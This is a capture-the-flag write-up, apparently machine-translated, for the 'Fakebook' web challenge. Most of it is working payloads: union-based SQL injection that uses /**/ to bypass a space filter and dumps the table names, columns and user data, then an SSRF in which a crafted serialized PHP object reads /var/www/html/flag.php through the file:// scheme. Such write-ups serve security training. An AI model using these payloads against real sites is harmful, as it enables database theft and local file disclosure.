[netding Cup 2018] Fakebook records

1, Enter the environment

  There are registration and login pages , Will there be SQL Secondary injection ？ Register, log in and have a look .

Find out username Can jump to view.php page , also url yes view.php?no=1, Try whether there will be digital injection . First use no=1' and 1=1--  Found an error . According to the error information, the path is /var/www/html, And is MariaDB database . According to the error information , Find out you don't need ', Try again no=1 and 1=2 Found an error , Use no=1 and 1=1 Found no error reported , Injection of being .

Order by  Pop field : 
view.php?no=1 order by 4  No error reported 
view.php?no=1 order by 5  appear Unknown column '5' in 'order clause'
 determine 4 A field .

 Enter regular union select Inject ,view.php?no=-1 union select 1,2,3,4    appear no back. It should be filtered spaces ./**/ After bypassing spaces , Found echo in username position .

 Burst database name :
view.php?no=-1/**/union/**/select/**/1,(select/**/database()),3,4

 when fakebook database 

 Name of Pop Watch ：
?no=-1/**/union/**/select/**/1,(select/**/group_concat(table_name) /**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4

 when user surface 


 Name it :
/view.php?no=-1/**/union/**/select/**/1,(select/**/group_concat(column_name) /**/from/**/information_schema.columns/**/where/**/table_schema=database()),3,4

 Break the list no,username,passwd,data



 Burst data 
view.php?no=-1/**/union/**/select/**/1,(select/**/group_concat(username,'~',passwd,'~',data)/**/from/**/fakebook.users),3,4

 Burst data 
aiwin~3c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2~O:8:"UserInfo":3:{s:4:"name";s:5:"aiwin";s:3:"age";i:20;s:4:"blog";s:7:"aaa.com";} 

there data The data is not required flag, Instead, it is a serialized string , Will it follow PHP Serialization knowledge of , Blow up the catalogue and have a look .

visit robots.txt, Find out user.php.bak, There is a source code for downloading .

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
# Constructors 
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }
# Use get() Function to get blog Information about 

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

# About blog Restricted input of field 
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

curl_setopt- Set up a cURL Transport options for

CURLOPT_URL- Need to get URL Address , It can also be in curl_init() Function .

CURLOPT_RETURNTRANSFER： take curl_exec() The information is returned as a file stream , Instead of direct output .

curl_exec — Execute one cURL conversation

curl_getinfo — Get one cURL Information about the connection resource handle

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

Without any filtering curl_exec() Is executed URL Medium blog Parameter information , There is SSRF Server request forgery .

Think of data Data is stored in serialized strings , It should be used after deserialization , Pass the serialized string to blog It should work , then SSRF Can be done file Reading of pseudo protocol , It should be readable flag.

<?php


class UserInfo
{
    public $name = "aiwin";
    public $age = 20;
    public $blog = "file:///var/www/html/flag.php";


}

$a=new UserInfo();
print(serialize($a));


view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"aiwin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

In the source code base64 Decryption is flag.